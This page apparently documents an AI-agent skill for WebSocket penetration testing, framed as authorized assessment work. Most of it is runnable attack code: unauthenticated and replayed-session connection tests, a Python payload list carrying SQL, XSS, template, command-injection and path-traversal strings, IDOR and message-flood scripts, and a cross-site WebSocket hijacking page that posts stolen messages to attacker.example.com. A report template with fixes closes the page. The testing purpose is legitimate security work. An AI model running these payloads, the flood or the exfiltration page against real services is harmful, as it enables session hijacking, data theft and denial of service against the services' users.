Loading...
Loading...
Testing WebSocket implementations for authentication bypass, cross-site hijacking, injection attacks, and insecure message handling during authorized security assessments.
npx skill4agent add mukul975/anthropic-cybersecurity-skills exploiting-websocket-vulnerabilitiescargo install websocatnpm install -g wscatpip install websockets# Check for WebSocket upgrade in response headers
curl -s -I \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
-H "Sec-WebSocket-Version: 13" \
"https://target.example.com/ws"
# Common WebSocket endpoint paths
for path in /ws /websocket /socket /socket.io /signalr /hub \
/chat /notifications /live /stream /realtime /api/ws; do
echo -n "$path: "
status=$(curl -s -o /dev/null -w "%{http_code}" \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
-H "Sec-WebSocket-Version: 13" \
"https://target.example.com$path")
echo "$status"
done
# Check for Socket.IO
curl -s "https://target.example.com/socket.io/?EIO=4&transport=polling"
# Check for SignalR
curl -s "https://target.example.com/signalr/negotiate"
# In browser DevTools:
# Network tab > Filter: WS
# Look for ws:// or wss:// connections
# Examine the upgrade request and WebSocket frames# Test connection without authentication
wscat -c "wss://target.example.com/ws"
# If connection succeeds without tokens, auth is missing
# Test with expired/invalid token
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=invalid_or_expired_token"
# Test connection with stolen/replayed session
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=valid_session_from_another_user"
# Test token in WebSocket URL parameter
wscat -c "wss://target.example.com/ws?token=invalid_token"
# Test if authentication is only checked at connection time
# Connect with valid token, then check if messages still work
# after the token expires or the user logs out
# Using Python for automated testing
python3 << 'PYEOF'
import asyncio
import websockets
async def test_no_auth():
try:
async with websockets.connect("wss://target.example.com/ws") as ws:
print("Connected WITHOUT authentication!")
# Try sending a message
await ws.send('{"type":"get_data","resource":"users"}')
response = await ws.recv()
print(f"Response: {response}")
except Exception as e:
print(f"Connection failed: {e}")
asyncio.run(test_no_auth())
PYEOF# Check Origin header validation on WebSocket upgrade
curl -s -I \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
-H "Sec-WebSocket-Version: 13" \
-H "Origin: https://evil.example.com" \
"https://target.example.com/ws"
# If 101 Switching Protocols: Origin not validated (vulnerable to CSWSH)
# If 403: Origin validation is working<!-- Cross-Site WebSocket Hijacking PoC -->
<!-- Host on attacker-controlled server -->
<html>
<head><title>CSWSH PoC</title></head>
<body>
<h1>Cross-Site WebSocket Hijacking</h1>
<div id="messages"></div>
<script>
// This connects to the target's WebSocket using the victim's cookies
var ws = new WebSocket("wss://target.example.com/ws");
ws.onopen = function() {
console.log("WebSocket connected (using victim's session)");
// Request sensitive data through the WebSocket
ws.send(JSON.stringify({type: "get_messages", channel: "private"}));
ws.send(JSON.stringify({type: "get_profile"}));
};
ws.onmessage = function(event) {
console.log("Data stolen: " + event.data);
document.getElementById("messages").innerText += event.data + "\n";
// Exfiltrate to attacker server
fetch("https://attacker.example.com/collect", {
method: "POST",
body: event.data
});
};
ws.onerror = function(error) {
console.log("WebSocket error: " + error);
};
</script>
</body>
</html># Using wscat for manual message injection testing
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=valid_session_token"
# Once connected, send test messages:
# SQL injection in WebSocket message
# > {"action":"search","query":"' OR 1=1--"}
# XSS payload in chat message
# > {"type":"message","content":"<script>alert(document.cookie)</script>"}
# > {"type":"message","content":"<img src=x onerror=alert(1)>"}
# Command injection
# > {"action":"ping","host":"127.0.0.1; whoami"}
# Path traversal
# > {"action":"read_file","path":"../../../etc/passwd"}
# IDOR in WebSocket messages
# > {"action":"get_messages","channel_id":1}
# > {"action":"get_messages","channel_id":2} (another user's channel)
# Automated injection testing with Python
python3 << 'PYEOF'
import asyncio
import websockets
import json
PAYLOADS = [
{"action": "search", "query": "' OR 1=1--"},
{"action": "search", "query": "<script>alert(1)</script>"},
{"action": "search", "query": "{{7*7}}"},
{"action": "search", "query": "${7*7}"},
{"action": "read", "file": "../../../etc/passwd"},
{"action": "exec", "cmd": "; whoami"},
]
async def test_injections():
async with websockets.connect(
"wss://target.example.com/ws",
extra_headers={"Cookie": "session=valid_token"}
) as ws:
for payload in PAYLOADS:
await ws.send(json.dumps(payload))
try:
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"Payload: {json.dumps(payload)}")
print(f"Response: {response}\n")
except asyncio.TimeoutError:
print(f"Timeout for: {json.dumps(payload)}\n")
asyncio.run(test_injections())
PYEOF# Test accessing other users' data via WebSocket
python3 << 'PYEOF'
import asyncio
import websockets
import json
async def test_authz():
async with websockets.connect(
"wss://target.example.com/ws",
extra_headers={"Cookie": "session=user_a_session"}
) as ws:
# Try accessing User B's private data
messages = [
{"type": "subscribe", "channel": "user_b_private"},
{"type": "get_history", "user_id": "user_b_id"},
{"type": "admin_action", "action": "list_users"},
{"type": "send_message", "to": "admin", "as": "admin"},
]
for msg in messages:
await ws.send(json.dumps(msg))
try:
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"Sent: {json.dumps(msg)}")
print(f"Received: {response}\n")
except asyncio.TimeoutError:
print(f"No response for: {json.dumps(msg)}\n")
asyncio.run(test_authz())
PYEOF
# Test rate limiting on WebSocket messages
python3 << 'PYEOF'
import asyncio
import websockets
import json
import time
async def test_rate_limit():
async with websockets.connect(
"wss://target.example.com/ws",
extra_headers={"Cookie": "session=valid_token"}
) as ws:
start = time.time()
for i in range(1000):
await ws.send(json.dumps({
"type": "message",
"content": f"Flood message {i}"
}))
elapsed = time.time() - start
print(f"Sent 1000 messages in {elapsed:.2f} seconds")
print("If no rate limiting, DoS is possible")
asyncio.run(test_rate_limit())
PYEOF# Check if WebSocket uses WSS (encrypted) or WS (plaintext)
# WS (ws://) traffic can be intercepted by network attackers
# Check for mixed protocols
# Application on HTTPS but WebSocket on WS = insecure
curl -s "https://target.example.com/" | grep -oP "ws://[^\"']+"
# Should only find wss:// (encrypted WebSocket)
# Test Sec-WebSocket-Protocol header handling
wscat -c "wss://target.example.com/ws" \
-H "Sec-WebSocket-Protocol: admin-protocol"
# Test for compression side-channel (CRIME-like attacks)
# Check if Sec-WebSocket-Extensions includes permessage-deflate
curl -s -I \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Extensions: permessage-deflate" \
"https://target.example.com/ws" | grep -i "sec-websocket-extensions"
# permessage-deflate with secrets in messages can leak data via compression
# Test WebSocket connection persistence
# Check if server implements proper timeouts and connection limits| Concept | Description |
|---|---|
| WebSocket Handshake | HTTP upgrade request that transitions the connection from HTTP to WebSocket protocol |
| CSWSH | Cross-Site WebSocket Hijacking - exploiting missing Origin validation to hijack sessions |
| Origin Validation | Server-side check that the WebSocket upgrade request comes from a trusted origin |
| Message-level Authorization | Verifying permissions for each WebSocket message, not just at connection time |
| WSS | WebSocket Secure - encrypted WebSocket connection over TLS (equivalent to HTTPS) |
| Socket.IO | Popular WebSocket library with automatic fallback to HTTP long-polling |
| Ping/Pong Frames | WebSocket keepalive mechanism; can be abused for timing attacks |
| Tool | Purpose |
|---|---|
| Burp Suite Professional | WebSocket interception, modification, and history analysis |
| wscat | Command-line WebSocket client for manual testing |
| websocat | Versatile command-line WebSocket client written in Rust |
| Browser DevTools | Network tab WS filter for inspecting WebSocket frames |
| Socket.IO Client | Testing Socket.IO-based WebSocket implementations |
| Python websockets | Scripting automated WebSocket attack sequences |
symbol## WebSocket Security Assessment Report
**Vulnerability**: Cross-Site WebSocket Hijacking (CSWSH)
**Severity**: High (CVSS 8.1)
**Location**: wss://target.example.com/ws
**OWASP Category**: A01:2021 - Broken Access Control
### WebSocket Configuration
| Property | Value |
|----------|-------|
| Protocol | WSS (encrypted) |
| Library | Socket.IO 4.x |
| Authentication | Cookie-based session |
| Origin Validation | NOT ENFORCED |
| Message Authorization | NOT ENFORCED |
| Rate Limiting | NOT IMPLEMENTED |
### Findings
| Finding | Severity |
|---------|----------|
| CSWSH - No Origin validation | High |
| Missing message-level authorization | High |
| XSS via chat message injection | Medium |
| No rate limiting on messages | Medium |
| Channel IDOR (subscribe to any channel) | High |
| WebSocket open after logout | Medium |
### Impact
- Private message exfiltration via CSWSH
- Account impersonation through unauthorized message sending
- Cross-channel data access affecting all users
- DoS via message flooding (no rate limits)
### Recommendation
1. Validate the Origin header during WebSocket handshake
2. Implement CSRF tokens in the WebSocket upgrade request
3. Enforce authorization checks on every WebSocket message
4. Sanitize all user input in WebSocket messages (prevent XSS/SQLi)
5. Implement message rate limiting per connection
6. Invalidate WebSocket connections on logout or session expiration
7. Use per-message authentication tokens rather than relying solely on the initial handshake